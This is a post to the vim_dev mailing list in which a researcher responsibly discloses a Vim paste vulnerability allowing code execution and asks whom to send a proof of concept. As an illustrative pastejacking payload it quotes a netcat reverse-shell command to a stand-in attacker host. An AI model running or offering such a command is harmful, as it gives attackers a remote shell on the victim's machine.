Hi, I have found a possibility to exit INSERT mode with a specially crafted message, then executing code on the computer on which this message is pasted. If you combine this with pastejacking (eg. user this he copies a simple text message, but actually copies something that executes nc -e /bin/sh r3m0t3.com), then it gives the possibility to remote code execute. Just by a wrong copy paste from a bad website. Additionally you don't need to be in INSERT mode to have it working.
PoC is ready, but first of all I would like to know if that's the correct way to contact you about it or not. If yes, then please point me out a trusted developer whom I can send my PoC. If not, please redirect me to the correct place. cheers, sıx -- -- You received this message from the "vim_dev" maillist. Do not top-post! Type your reply below the text you are replying to. For more information, visit http://www.vim.org/maillist.php --- You received this message because you are subscribed to the Google Groups "vim_dev" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. For more options, visit https://groups.google.com/d/optout.
